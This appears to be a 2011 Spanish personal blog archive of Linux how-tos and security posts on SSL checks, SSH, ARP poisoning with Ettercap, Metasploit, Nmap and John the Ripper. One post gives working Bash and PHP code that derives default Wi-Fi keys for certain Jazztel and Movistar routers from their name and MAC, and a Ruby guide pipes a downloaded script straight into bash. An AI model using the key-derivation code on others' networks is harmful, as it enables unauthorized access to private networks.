miércoles, 15 de junio de 2011

Como averiguar el nivel de seguridad SSL de una página web (HTTPs)

En anteriores artículos os he explicado qué tipos de cifrados asimétricos, simétricos, y de autenticación (hash) podemos encontrarnos.

Os he explicado en muchas ocasiones que conectándonos a través de SSL estamos más seguros en la red que no haciéndolo.

También informé sobre la herramienta de Google para acelerar el SSL, y sobre la implementación de SSL en Youtube, en Facebook y en Twitter.

Ahora os traigo una pequeña página web que analiza la seguridad de la página web (en lo que al SSL se refiere).

Es capaz de decirnos sus puntos fuertes y sus puntos débiles. Al final del escáner nos muestra los resultados y nos da una puntuación.

A continuación tenéis la web y unas capturas de pantalla para que lo veáis. Nos metemos en esta web: Qualys SSL Labs

Metemos la dirección de la página web y pinchamos en el botón Submit, si la página web ya está analizada (de un análisis anterior), nos mostrará los resultados inmediatamente.

En esta pantalla encontramos información sobre el certificado, cuando expira, la llave utilizada (key) y el algoritmo. Como ejemplo he usado mi banco, Google y mi propio blog... a continuación algunos pantallazos.





En la siguiente captura podéis ver los protocolos y cifrados que soportan, soportar más protocolos no es sinónimo de una mayor seguridad, justo al contrario.

Se deberían deshabilitar esos protocolos antiguos, por suerte, Facebook no usa ninguno antiguo (luego veremos que hay otras webs que sí).

Y aquí tenemos en lo que casi todos fallan, la renegociación TLS, donde lo han deshabilitado para esquivar el bug del TLS-renegotiation. Otros simplemente lo tienen activado…con el bug.



Sin embargo, la web de Google, cumple con todo lo establecido, o sea perfecta.

Ahora ya podremos saber de una manera más técnica si una web con SSL es más segura que otra, sobre todo podéis mirar la seguridad de los bancos y plataformas de pago que es donde la seguridad es lo más importante.

Enlaces de interés:

  1. Twitter implementa HTTPs por defecto para proteger nuestra seguridad y privacidad

  2. Youtube empieza a usar el protocolo HTTPS (SSL) para conexiones cifradas en sus vídeos

  3. Facebook permite conexiones HTTPS siempre que nos conectemos

  4. Ciberataque a RSA : Roban información de la división de seguridad de EMC

  5. Redes Sociales : Seguridad y privacidad

martes, 24 de mayo de 2011

Google crea una herramienta para acelerar el SSL

Cuando utilizamos seguridad en la web (HTTPS), normalmente las páginas web cargan más lentamente ya que el cifrado de datos reduce la velocidad de carga.

Google ha estado probando un nueva herramienta para acelerar el proceso.

La herramienta se llama SSL False Start y ha sido implementado en Chrome 9, las pruebas que han realizado reducen el handshake de SSL en un 30%.

Google se ha preocupado de hacer que este sistema sea también compatible con versiones anteriores para satisfacer la experiencia de usuario.

Hay sitios web que no son compatibles (todavía) con False Start, Google incluirá en Chrome la lista de sitios que no son compatibles.

Sin duda, una buena noticia para aumentar nuestra seguridad en la red, sin sacrificar la velocidad de carga.

Tenéis más información en el Blog De Chrome

Visto en: RedesZone

sábado, 21 de mayo de 2011

jueves, 5 de mayo de 2011

Instalacion de Ruby on Rails en Linux

Ruby es un lenguaje de programación interpretado. Ruby funciona con cualquier sistema operativo moderno, pero se siente más "en casa" en sistemas tipo Unix (como por ejemplo y es nuestro caso de instalación un Linux).

La manera en que instalemos ruby depende mucho de nuestro tipo de máquina y sus necesidades. Es recomendable que lea todo lo relevante a la plataforma que desee instalar antes de que haga una decisión acerca de cómo instalarlo.

http://www.ruby-lang.org/es/


http://www.pablasso.com/2009/01/12/%C2%BFcomo-instalar-ruby-on-rails-en-ubuntu


http://www.noticias-tecnologia.com.ar/tutoriales/instalar-ruby-on-rails-en-windows/


Pasos rápidos y sencillos (Para Linux Ubuntu 10.04, 10.10 y 11.04):
NOTA: DEBE SER UNA INSTALACIÓN LIMPIA, ME REFIERO DESDE CERO...DESINSTALANDO TODO AQUELLO QUE TUVIÉSEMOS EN EL DISCO RELACIONADO CON RUBY, RAILS, GEM O REDCAR....


mike@m7:~$ sudo apt-get install rails



Una vez todo instalado, incluidas las dependencias, tendréis un entorno listo para funcionar...pero si queremos tener las ultimas versiones de todo no tendremos otro remedio que seguir los siguientes pasos para poder tenerlos.

mike@m7:~$ sudo apt-get install build-essential git-core curl


mike@m7:~$ bash < <(curl -s https://rvm.beginrescueend.com/install/rvm)


mike@m7:~$ echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc



En otra consola diferente, cerráis la que esta abierta y volvéis a abrir otra diferente (sino no funcionara)

mike@m7:~$ rvm notes


mike@m7:~$ sudo apt-get install build-essential bison openssl libreadline6 libreadline6-dev curl git-core zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt-dev autoconf libc6-dev ncurses-dev


mike@m7:~$ sudo gem install sqlite3-ruby


mike@m7:~$ rvm install ruby-1.9.2


mike@m7:~$ rvm use ruby-1.9.2 --default


mike@m7:~$ gem update --system


mike@m7:~$ gem install rails


mike@m7:~$ gem install sqlite3


mike@m7:~$ ruby -v



Y debería apareceros lo siguiente:



mike@m7:~$ gem -v





mike@m7:~$ rails -v






mike@m7:~$ gem list





Y por ultimo os recomiendo que descargeis el siguiente entorno para programación que encontré para ello, sobre todo para Ruby, escrito en Python....

Enlace de descarga: http://www.sublimetext.com/2


Lo descargáis en cualquier carpeta, lo descomprimís y os metéis en la carpeta...veréis lo siguiente...



Bien, el ejecutable es “sublime_text”...desde Nautilus (pulsando dos veces sobre el nombre del archivo) o desde la terminal con

mike@m86:~/rails/Sublime Text 2$ ./sublime_text



Y listo … aquí lo tenéis en funcionamiento....

jueves, 31 de marzo de 2011

Instalar Firefox 4.0 desde repositorios...

Para instalar Firefox 4.0 desde los repositorios oficiales nada mas fácil que introducir esto desde la consola lo siguiente...

Tanto para 10.04 como 10.10 de Linux en Ubuntu:

sudo add-apt-repository ppa:mozillateam/firefox-stable


sudo apt-get update


sudo apt-get install firefox ubufox



O directamente en una sola línea de la siguiente forma:

sudo add-apt-repository ppa:mozillateam/firefox-stable && sudo apt-get update && sudo apt-get install firefox ubufox



Si tenéis problemas con el idioma, y solo descarga la versión inglesa elegid de los siguientes enlaces dependiendo de la versión que tengais 32 bits / 64 bits.

Además si quereis cambiarle la apariencia en Linux y darle un toque mas azul podeis probar con el siguiente tema GTK+

Enlace de descarga: Tema Bluebird para Firefox 4

Y además podeis tener el tema completo en Ubuntu de la siguiente forma:

sudo add-apt-repository ppa:webupd8team/themes && sudo apt-get update && sudo apt-get install bluebird-gtk-theme



o por separado también asi:

sudo add-apt-repository ppa:webupd8team/themes


sudo apt-get update


sudo apt-get install bluebird-gtk-theme


lunes, 21 de marzo de 2011

Manual recopilatorio de trucos y hacks para Ubuntu en PDF



PDF con más de 60 páginas rellenas de interesante información:
Un poco de teoría



  • Diagrama de software libre

  • Mapa conceptual del software libre

  • Comandos básicos para consola

  • Sistema de jerarquía de ficheros



domingo, 20 de marzo de 2011

Como acelerar Ubuntu...

Todos los que leemos este blog, o eso espero, somos usuarios de Ubuntu, principalmente. Esta distro es muy simple de usar, instalar y configurar. Pero, seamos sinceros, no se caracteriza por su velocidad.

Si bien es veloz y estable, aquí les dejo un par de trucos que he visto en Ubuntips para mejorar su rendimiento.

Mover los directorios temporales a la memoria

Mover el directorio /tmp a la memoria porque es mas veloz que el disco y ademas ayuda a cuidar el disco, en especial si han realizado la instalación de ubuntu en una netbook con SSD.

Deben editar el archivo /etc/fstab y agregar la siguiente linea:

tmpfs /tmp tmpfs defaults,noexec,nosuid 0 0



Guardar los cambios y reiniciar el pc.

Instalar Preload

Preload es una aplicacion que de manera inteligente pre-cargara en la memoria los archivos y aplicaciones que mas uses. A causa de esto, pueden notar que el pc tarda un poco mas en arrancar pero solo es eso, luego notareis como todo va mas rapido.

sudo apt-get install preload



Deshabilitar los servicios que no usemos

En muchos casos se corren todo el tiempo servicios que no se usan y que estan constantemente consumiento memoria y procesador. Ejemplos clasicos son: apache y mysql, para deshabilitar por ejemplo a mysql ejecutad el siguiente comando:

sudo update-rc.d mysql remove



Si quereis saber que se ejecuta al inicio debéis hacer lo que hice yo antes del anterior comando:

ls -l /etc/rc0.d


ls -l /etc/rc1.d



y asi sucesivamente hasta el rc6.d, con lo que veréis que programas o servicios se ejecutan desde el nivel 0 hasta el 6 del kernel de Linux.

Mucho ojo con lo que quitais, consultad en el manual de Ubuntu para que sirve cada servicio que deseais deshabilitar.



Desactivar las aplicaciones con autoarranque

Hay varias aplicaciones que normalmente no se usan y aun asi arrancan cuando arrancamos el pc. Las pueden ver en Sistema -> Preferencias -> Aplicaciones al inicio.

Cambiar el modo de usar la Swap

Al igual que como decia con respecto a /tmp si es posible no usar el disco y usar la memoria en su lugar entonces deberíamos hacerlo, porque los accesos al disco son lentos.

Si tienen 2, 3 o 4Gb de Ram probablemente no necesiten casi nada de Swap. No vayan a cometer ese error que dice “Swap debe ser el doble de la ram”, por lo general la regla no se cumple.

Entra a /etc/sysctl.conf y cambien la siguiente linea (agregar si no existe):

vm.swappiness=10



El valor asignado le dirá a su sistema cual es la probabilidad de que use Swap, es un valor entre 0 y 100. Si tienen menos de 1Gb de ram deberian cambiar ese valor a 40 o 50 para que use mas la swap.

Después de modificar el archivo deben ejecutar

sudo sysctl -p o reiniciar el sistema



para que los cambios surtan efecto correctamente.

Para aplicar todos los cambios, debemos reiniciar el sistema.

Espero que les sea de utilidad. Los invito a comentar su experiencia. Y si encuentran algún truco más que me lo comenten. Un saludo.

Instala tema de escritorio Minty Freshness y otros...

Estos temas GTK e iconos son sólo para 10.04, 10.10 y 11.04....

Lo primero es que debes tener el PPA de Webupd8 instalado de la siguiente manera:

sudo add-apt-repository ppa:webupd8team/themes && sudo apt-get update





Lo siguiente es instalar el tema en si de la siguiente forma:

sudo apt-get install minty-freshness-theme





Si además queréis tener los iconos Buuf haced lo siguiente:

sudo apt-get install buuf-icon-theme





O el tema GTK Victory debéis haced lo siguiente:

sudo apt-get install victory-gtk-theme



Visto en: Webupd8

Tema de iconos Faenza 0.9 actualizado



El famoso "Faenza Icon Theme" ha sido actualizado a la versión 0.9 hoy, con lo que tenemos un nuevo y "más oscuro" tema con iconos de estado y de acciones en tonos gris claro.

Aquí está la lista de cambios del tema "Faenza Icon Theme 0.9":

  • Un nuevo y "más oscuro" tema, en la barra de estado y las acciones, los iconos son de color gris claro.

  • Un grupo y amplio cambio de dispositivos viejos, nuevos y las acciones en todos los tamaños.

  • Nuevas aplicaciones: centro de software de Debian, dup-vu, CC + +, dvdrip, GCstar,guake, haguichi, Me TV, se funden, gestor de archivos, la herramienta de configuración de nautilus acciones, tvtime, xine, zim, etc.

  • Nuevos iconos de estado de la cubierta Gloobus, Me TV, zim, guake, KeePassX.

  • Resalte de los bordes se han modificado para todos los iconos, resultando un cuadrado de 22x22 y 24x24.

  • Todos los iconos monocromos se han modificado para suavizar el contraste.

  • Un nuevo diseño para la mayoría de las acciones de 32x32 y por encima de este.

  • Algunos iconos reelaborados para aplicaciones nuevas.

  • Cambios sutiles en el color de las carpetas.

  • Nuevo icono de Chrome.

  • Algunas revisiones de estabilidad.


Intalando en 9.10, 10.04 y 10.10:

Desde consola de comando teclea lo siguiente:

sudo add-apt-repository ppa:tiheum/equinox sudo apt-get update sudo apt-get install faenza-icon-theme



o en una sola linea:

sudo add-apt-repository ppa:tiheum/equinox && sudo apt-get update && sudo apt-get install faenza-icon-theme



También puedes descargarlo desde DevianArt
Visto en:  Wepupd8

sábado, 5 de marzo de 2011

Actualiza el kernel de Ubuntu 10.04 LTS...



Se han descubierto cerca de 40 vulnerabilidades en el kernel de Linux Ubuntu 10.04 (Lucid Lynx), versión LTS (Long Time Support) de esta distribución de GNU/Linux. Kubuntu, Edubuntu y Xubuntu con la misma numeración, están afectadas también.

Algunos de estos problemas están relacionados en la forma en que el “Common Internet File System” (CIFS) valida los paquetes ICPM (Internet Control Message Protocol), haciendo posible un ataque de denegación de servicio (DOS).

También se ha descubierto un agujero de seguridad en NFSv4 (Network File System v4) que permitirían a un atacante obtener privilegios administrativos. En total se han detectado nueve vulnerabilidades que otorgan privilegios de root y 14 que conducen a la denegación de servicio.

Otros están relacionados con la comprobación incorrecta de privilegios de archivo y la restricción de “solo-lectura” que, en un entorno multi-usuario puede afectar, entre otras cuestiones, a la privacidad. En el enlace a pie de artículo tienes la lista completa de vulnerabilidades publicada por Ubuntu.

Como viene siendo habitual en el mundo GNU/Linux, estos problemas se detectan y corrigen rápidamente. Ya existen parches para solventar estas vulnerabilidades y simplemente hay que actualizar.

Visto en : Genbeta

Para los españoles...


Visto en Ubuntu Life

miércoles, 2 de marzo de 2011

Linux: poner las páginas de Man en castellano

Las páginas de Man son indispensables cuando tenemos alguna duda acerca de la utilización de un comando o de sus parámetros.

Para quien no las haya usado basta con ejecutar desde consola:

$ man comando_del_que_obtener_información



Ejemplo:

$ man ls



Pero claro la información aparece en ingles. Si te interesa verla en castellano, Víctor Jose (Gracias) le envió un tip a Ubuntu Life de como lograrlo y que vio en Ubuntu-es.

Los pasos serian los siguientes:

(Primero lo de siempre)

$ sudo apt-get update


$ sudo apt-get upgrade



Y ahora sí:

$ sudo apt-get install manpages-es manpages-es-extra


$ sudo dpkg-reconfigure locales



Otra forma es ponerlo todo en un solo comando:

$ sudo apt-get update && sudo apt-get install manpages-es manpages-es-extra && sudo dpkg-reconfigure locales



Y listo, las páginas man deberían estar en español...o por lo menos casi todas.

[gallery link="file" orderby="title"]

domingo, 27 de febrero de 2011

Creando un firewall en Linux (Planificando y configurando - I Parte)

En este primer vídeo dividido en 2 os dejo una segunda parte de la configuracion, siguiendo un esquema de las maquinas virtuales necesarias para hacer un firewall. Una de ellas hace de firewall (un linux) y otras dos serán dos subredes (una linux y un XP)...CONTINUARA











miércoles, 9 de febrero de 2011

Routers WIFI al descubierto

Los usuarios de jazztel y movistar que no hayan cambiado el nombre (ESSID) de sus wifis pueden ir pensando en hacerlo: El algoritmo ha sido descifrado. Por lo visto, el que sacó a la luz el algoritmo fue elvecinoo en este hilo de lampiweb En http://kz.ath.cx/wlan/ (entre otros mas que alojan los algoritmos) se ingresa nombre y la MAC del router y te la clava.

Algunos ejemplos:

En BASH:

#!/bin/bash                                                                     

echo CalcWLAN by a.s.r

if [ $# -ne 2 ]
then
echo "Usage: $0 <ESSID> <BSSID>"
echo
echo "Example: $0 WLAN_C58D 64:68:0C:C5:C5:90"
exit 1
fi

HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d)
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)

echo "La puta clave es $KEY"


En PHP:

// THIS CODE IS UNDER THE PUBLIC DOMAIN

function right($string, $chars)
{
return substr($string, strlen($string) - $chars, $chars);
}

if (isset($_POST['essid']) && isset($_POST['bssid']))
{
$bssid = preg_replace('/:/', '', strtoupper(trim($_POST['bssid'])));

if (strlen($bssid) != 12)
{
die('Mete bien la MAC, buen hombre.');
}

$essid = strtoupper(trim($_POST['essid']));
$_ssid = substr($bssid, 0, 8).right($essid, 4);

die(substr(md5('bcgbghgg'.$_ssid.$bssid), 0, 20));
}


Daos prisa antes de que cierren las webs donde se alojan los fuentes.

martes, 8 de febrero de 2011

Protocolo SSH (5 prácticas sencillas)

En estos tutoriales que aquí comienzo, os dejo la primera practica, en la que creo una conexión sencilla a través del protocolo SSH....







En estos segundo tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando un par de claves públicas/privadas...







En este tercer tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando el servidor X incluido en Linux...







En este cuarto tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando el servidor Telnet, que es del todo menos seguro y su uso en Wireshark creando un túnel con SSH para volverlo seguro...







En este ultimo y quinto tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando a un tercero que nos dará acceso a internet, el cual nosotros no poseemos directamente...






Espero que os hayan sido de ayuda...un saludo

OpenSSH (Introducción)

SSH (Secure SHell, en español: intérprete de órdenes segura) es el nombre de un protocolo y del programa que lo implementa, y sirve para acceder a máquinas remotas a través de una red. Permite manejar por completo la computadora mediante un intérprete de comandos, y también puede redirigir el tráfico de X para poder ejecutar programas gráficos si tenemos un Servidor X (en sistemas UnixWindows) corriendo.

Además de la conexión a otros dispositivos, SSH nos permite copiar datos de forma segura (tanto ficheros sueltos como simular sesiones FTP cifradas), gestionar claves RSA para no escribir claves al conectar a los dispositivos y pasar los datos de cualquier otra aplicación por un canal seguro tunelizado mediante SSH.

OpenSSH (Open Secure Shell) es un conjunto de aplicaciones que permiten realizar comunicaciones cifradas a través de una red, usando el protocolo SSH. Fue creado como una alternativa libre y abierta al programa Secure Shell, que es software propietario. El proyecto está liderado por Theo de Raadt, residente en Calgary.

La suite OpenSSH incluye:

  • ssh, reemplaza a rlogintelnet para permitir shell el acceso remoto a otra máquina. ssh tero@ejemplo.com

  • scp, reemplaza a rcp scp tero@ejemplo.com:~/archivo .

  • sftp, reemplaza a ftp para copiar archivos entre dos computadoras sftp tero@ejemplo.com

  • sshd, el servidor demonio SSH sshd

  • ssh-keygen, una herramienta para inspeccionar y generar claves RSADSA que son usadas para la autenticación del cliente o usuario.

  • ssh-agent y ssh-add, herramientas para autenticarse de manera mas fácil, manteniendo las claves listas para no tener que volver a introducir la frase de acceso cada vez que utilice la clave.

  • ssh-keyscan, que escanea una lista de clientes y recolecta sus claves públicas.


El servidor OpenSSH puede autenticar a los usuarios mediante todos los métodos estándar del protocolo ssh

domingo, 6 de febrero de 2011

Libros de recomendada lectura...

Estos libros que dejo para descarga espero me sean muy útiles en el curso de Seguridad que estoy recibiendo y de paso os los dejo a vosotros para su lectura recomendada...

  1. Seguridad física...algo tan importante en una empresa como lo sería la seguridad informática del software.

  2. Documentación sobre iptables-firewall de Linux. Importante a la hora de protegeros en cualquier sistema Linux hoy en dia.

  3. Guía de Seguridad del Administrador de Linux, traducido y muy recomendable para cualquier administrador de sistemas y seguridad en Linux.

  4. Introducción al SSH versión 0.2, tema muy importante, sobre todo en seguridad.

  5. Análisis de seguridad de la familia de protocolos TCP/IP y sus servicios asociados, algo sobre Hacking, pero sobre todo como protegernos de ese protocolo y su familia.


Un saludo. Mike Mars.


 

 

Los 10 mandamientos...

Los Mandamientos de Linux


Y habla Dios todo esto, diciendo:
"Yo soy Linux, tu Dios, que te he sacado de la tierra de Microsoft, de la casa de la servidumbre"


  • No tendrás otro Dios que a mí, pero te dejo coquetear con cualquier sistema que funcione.

  • No instalarás sistemas operativos monopolistas, ni te prosternarás ante ellos, y no los servirás, porque soy un Dios celoso...

  • No utilizaras software propietario.

  • Navegarás por páginas que soporten Lynx

  • No tomarás el nombre de Linux en vano

  • Santificarás los demonios y las fiestas jugando al Cibermús.

  • Honrarás a los profetas de Linux, a aquellos que contribuyen.

  • Cerrarás tu puerto de finger. No saldrás a la red como root.

  • No adorarás ídolos en forma de tarjetas multipuerto a 9600 baudios.

  • El primer juego que ejecutes será el Xbill, y Sí Matarás.

  • Sí adulterarás, y te harás compatible con cuantos sistemas se dejen.

  • Realizarás ingeniería inversa.

  • No levantarás falso testimonio contra el kernel. No tiene bugs.


Estos mandamientos se resumen en dos:


Amarás a Linux sobre todas las cosas y al OpenSource como a tí mismo.


Origen: desconocido. Autor: desconocido. Obtenido de Fidonet (R34.LINUX)


miércoles, 2 de febrero de 2011

Envenenamiento ARP (Conclusión - VI)

Conclusión


Hemos visto cómo un ataque tan peligroso puede ser llevado a cabo con significativa facilidad haciendo uso de una herramienta que está a disposición de todo el mundo.Si cualquier aficionado es capaz de logar escuchas protegidas y privadas, ¿qué no podrá hacer un experto en redes?. Muchos son los administradores de redes que adjudican tiempo y dinero a soluciones a nivel de red como pueden ser firewalls, firewalls­bridge, sistemas de detección y prevención de intrusiones (IDS, IPS respectivamente), etc... pero que son inútiles en este tipo de ataques, en donde el nivel más básico y bajo el cual se sustentan todos los demás niveles queda desprotegido ante cualquier aficionado. Así que no deje descuidada la red si desea mantener la privacidad de sus datos. En caso de pertenecer a una red en donde usted contemple que la seguridad queda en entredicho, no dude consultar al administrador y hacerle saber el problema. Por lo demás, tomemos siempre precauciones, es mejor ser desconfiado.

Mike Mars



Bibliografía


www.google.com


http://es.wikipedia.org


www.monografias.com


http://www.rfc­editor.org/rfc/rfc826.txt


http://bulma.net/body.phtml?nIdNoticia=1193


www.secudos.de


http://ettercap.sourceforge.net


http://ditec.um.es/laso/docs/tut­tcpip/3376c28.html#figethfram


www.robota.net


www.irongeek.com


http://www.maestrosdelweb.com/editorial/sniffers/


http://www.xombra.com/go_articulo.php?articulo=47


Tutorial V

Tutorial IV

Tutorial III

Tutorial II

Tutorial I

Envenenamiento ARP (Soluciones - V)

Soluciones


5.1 ARPwatch

En sistemas Linux la herramienta ARPWatch ( http://www­nrg.ee.lbl.gov/) nos puede servir para detectar el uso del envenenamiento ARP en nuestro sistema. Con ARPWatch podemos comprobar la correspondencia entre pares IP­MAC (Ethernet). En caso de que un cambio en un par se produzca (esto es, se escuche en el interfaz de red del sistema), ARPWatch envía un correo de notificación del suceso a la cuenta root o administrador del sistema con un mensaje tipo "FLIP FLOP o Change ethernet address" . También podemos monitorizar la existencia de nuevos host (aparición de una nueva MAC en la red).

Envenenamiento ARP (Ettercap - IV)

Ettercap


Una de las herramientas más potentes que hacen uso del envenenamiento ARP en entornos GNU/Linux es Ettercap (http://ettercap.sourceforge.net). Ésta es una herramienta con licencia GPL diseñada con el fin de analizar , filtrar, logear y escuchar determinado tráfico circulando por la red. Soporta disección activa y pasiva de muchos protocolos (incluso los cifrados). Es capaz de realizar ataques MITM (Man in the Middle) entre diferentes hosts de la red , con el fin de entrometerse en su comunicación y obtener información valiosa tipo contraseñas POP, SSH, Telnet, FTP, Https, etc...

Decir que la mayoría de los sistemas operativos (excepto linux 2.4 y solaris 8) no implementan estados en el protocolo arp (aceptan arp­ replys sin haber enviado antes un request), por lo que facilmente aceptan respuestas ARP y en consecuencia modifican su tabla ARP en caché con cada arp­reply recibido.

martes, 1 de febrero de 2011

Metasploit: Uso en Linux y Windows (Parte II)



Después del primer post sobre el Metasploit donde os enseñaba a instalarlo tanto para Linux como Windows, ahora os dejo después de usar el Nmap para descubrir las posibles vulnerabilidades del Windows 2003 y Windows XP SP3 (usados en mis pruebas, bajo VirtualBox) como se usa para explotar esa vulnerabilidad en ambos sistemas...espero que os sirva.

En cuanto descubra nuevas posibilidades os dejaré mas vídeos....un saludo a todos:)





Descubre vulnerabilidades con Nmap en Linux / Windows

Como os prometí en algún comentario anterior, para mostraros el uso del conocido Metasploit, debemos antes descubrir las posibles vulnerabilidades de nuestra victima (de su sistema operativo).

Para ello usaremos el Nmap para Linux / Windows.

Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.

lunes, 31 de enero de 2011

Metasploit: Instalación en Linux y Windows (Parte I)

El Proyecto Metasploit es un proyecto open source de seguridad informática que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración y en el desarrollo de firmas para Sistemas de Detección de Intrusos.

Su subproyecto más conocido es el Metasploit Framework, una herramienta para desarrollar y ejecutar exploits contra una máquina remota.

Otros subproyectos importantes son la bases de datos de opcodes (códigos de operación), un archivo de shellcodes, e investigación sobre seguridad.

Inicialmente fue creado utilizando el lenguaje de programación de scripting Perl, aunque actualmente el Metasploit Framework ha sido escrito de nuevo completamente en el lenguaje Ruby.

domingo, 30 de enero de 2011

John the Ripper (Windows v1.7.6)

John the Ripper es un programa que nos permite recuperar contraseñas a partir de los datos que existen en nuestro sistema. Actualmente está disponible para Unix/Linux, Windows, DOS, BeOS y OpenVMS. El propósito principal de esta herramienta es la detección se contraseñas débiles por parte del administrador del sistema.

John the Ripper no es un simple programa de cracking de contraseñas por fuerza bruta, dispone de varios modos de funcionamiento que permiten una búsqueda “inteligente” de las contraseñas más inseguras.

Por ejemplo, el modo single prueba como contraseñas candidatas el nombre de usuario, el nombre real, el nombre del home y combinaciones de estos nombres con números y letras.

Sin embargo, para entender cómo funciona John lo mejor es utilizarlo. ¿Te animas?

viernes, 28 de enero de 2011

AIDA64 Extreme / Business 1.0.1111 y 1.50.1200 (re-subido)



AIDA64 Extreme Edition - líder en la industria de diagnóstico y la evaluación del sistema ,comparativa y soluciones para los usuarios entusiastas de PC, basado en la galardonada tecnología de AIDA. AIDA presenta información exhaustiva de la información del sistema en 100 páginas, incluyendo la CPU, FPU, disco y puntos de referencia de memoria, monitoreo de hardware y técnicas avanzadas de diagnóstico.

miércoles, 26 de enero de 2011

John the Ripper (actualizado 1.7.6)

John the Ripper es un programa que nos permite recuperar contraseñas a partir de los datos que existen en nuestro sistema. Actualmente está disponible para Unix/Linux, Windows, DOS, BeOS y OpenVMS. El propósito principal de esta herramienta es la detección se contraseñas débiles por parte del administrador del sistema.

John the Ripper no es un simple programa de cracking de contraseñas por fuerza bruta, dispone de varios modos de funcionamiento que permiten una búsqueda “inteligente” de las contraseñas más inseguras.

Por ejemplo, el modo single prueba como contraseñas candidatas el nombre de usuario, el nombre real, el nombre del home y combinaciones de estos nombres con números y letras.

Sin embargo, para entender cómo funciona John lo mejor es utilizarlo. ¿Te animas?

lunes, 24 de enero de 2011

Como deshabilitar el ping en Ubuntu

En algunos ambientes podemos necesitar que nuestro equipo pase un poco más desapercibido de lo normal. Para esto, entre otras acciones, podemos desactivar la respuesta a todos los mensajes ICMP (Internet Control Message Protocol) por parte de nuestro equipo.

Esto implica que cualquier ping que se haga a nuestro sistema no será respondido, y también se vería afectado el traceroute.

Por lo tanto, si nos interesa activar este comportamiento, abrimos un terminal (Aplicaciones > Accesorios > Terminal) y ejecutamos el comando que necesitemos:
sudo -s "echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all"

Para volverlo a activarlo de nuevo:
sudo -s "echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all"

Para pararlo tendremos que pulsar Control+C. Entonces si obtenemos 100% packet loss, tenemos el ping deshabilitado. Y si obtenemos 0% packet loss, tenemos el ping habilitado.

Otra forma es decirle las veces que quereis hacer el ping con el siguiente comando:
(Repetir 5 veces el ping) : ping -c5 127.0.0.1

(Repetir 10 veces el ping) : ping -c10 127.0.0.1

Envenenamiento ARP (Vulnerabilidad - III)

VULNERABILIDAD


Como hemos visto, siempre que un host desea enviar cualquier tipo de información IP a otro host, deberá conocer la MAC del destino para poder transmitir. Es necesario enviar una petición ARP a la red , por medio de la cual sólo responderá el host destino diciendo al origen su dirección hardware. Es posible engañar a un host dentro de la red diciéndole que la dirección MAC con quien se quiere comunicar sea un tercer host, produciéndose así una re-dirección del tráfico del host origen al host destino, en donde toda la información que salga del host origen pase por un tercer host, y éste a su vez vuelva a redireccionar el tráfico hacia el host destino verdadero con el fin de funcionar transparentemente en la comunicación de ambos y observando todo lo que se dicen. Este tipo de ataque se conoce como “Hombre en medio” o “Man In The Middle”.

Envenenamiento ARP (Protocolo ARP - II)

PROTOCOLO ARP


En una red tipo IEEE 802/Ethernet los hosts se comunican conociendo sus direcciones MAC, y no siempre sabremos ni dispondremos a mano de todas las direcciones MAC de todos los ordenadores que conforman la red. Como hemos dicho, el protocolo ARP será el encargado de obtener las direcciones físicas a partir de direcciones IP. En este tipo de redes es necesario conocer la MAC del destino con el fin de que solo el paquete llegue al interfaz de red correspondiente y no a otro, así que cuando se quiere producir una comunicación entre un host1 y un host2 en este tipo de redes, se tendrán que realizar una serie de pasos para llevar a cabo una comunicación correcta. Como observamos, el concepto de ARP solo cobra sentido si nos encontramos en el ámbito de redes conmutadas / locales, pues de lo contrario no sería necesario conocer la MAC del destino dentro de la red, pues la información se enviaría en modo multidifusión a todos los equipos de la red.

Envenenamiento ARP (Introducción - I)

INTRODUCCIÓN


Unos de los puntos principales que han sido siempre motivo de quebraderos de cabeza para administradores y gestores de redes es el tema de la seguridad. La seguridad es la manera de mantener íntegra y salvo toda la información confidencial que viaja a través de la misma red, manteniendo cifrados seguros, evitando escuchas ajenas, accesos seguros y un largo etc... En este breve, pero conciso trabajo, me centrare en un tipo de vulnerabilidad en concreto en redes de arquitectura IEEE 802 o las antiguas DIX Ethernet que es posible hoy día explotar de manera relativamente fácil con algunas herramientas potentes que existen en Internet. Hablo del envenenamiento de ARP o ARP­poissoning.


Como su propio nombre indica, el objetivo es envenenar la comunicación que se produce en el protocolo de comunicación de paquetes ARP, que es el protocolo de resolución de direcciones responsable de convertir las direcciones de protocolo de alto nivel (direcciones IP) a direcciones de red físicas (MAC). Así pues, este breve trabajo explicare básicamente el funcionamiento del protocolo ARP, para centrarnos en donde puede afectar a la seguridad de nuestra red, y una vez hallamos definido el problema y el punto débil, veremos la potencia de la herramienta Ettercap que es capaz de explotar satisfactoriamente la vulnerabilidad a la que nos referimos. Finalmente , conociendo las posibilidades que la vulnerabilidad brinda a posibles atacantes, mostraremos algunas posibles soluciones que evitarán que nuestra red sea vulnerable a hosts maliciosos.

domingo, 23 de enero de 2011

50 bellos y deliciosos diseños con café...

El arte del café o café con leche consiste en el vertido de la leche al vapor en un tiro / lanzamiento del expresso sobre el café generando un patrón o diseño en la superficie.

El barista / cafetero, o como queráis llamarle, se convierte en un diseñador de verdad y es capaz de crear bellas creaciones.

Entre las formas más comunes se encuentra la "Rosetta" en la foto de la izquierda.

Latte art es un tema candente y hay incluso varias competiciones en todo el mundo mostrando esta forma de arte única.

En este artículo, o post te presento 50 hermosos - diseños de café que te harán babear ... - y ciertamente deben estar deliciosos...que ganas de un café a estas horas de la tarde...ummmmhhh.

viernes, 21 de enero de 2011

Angry Birds (for PC)



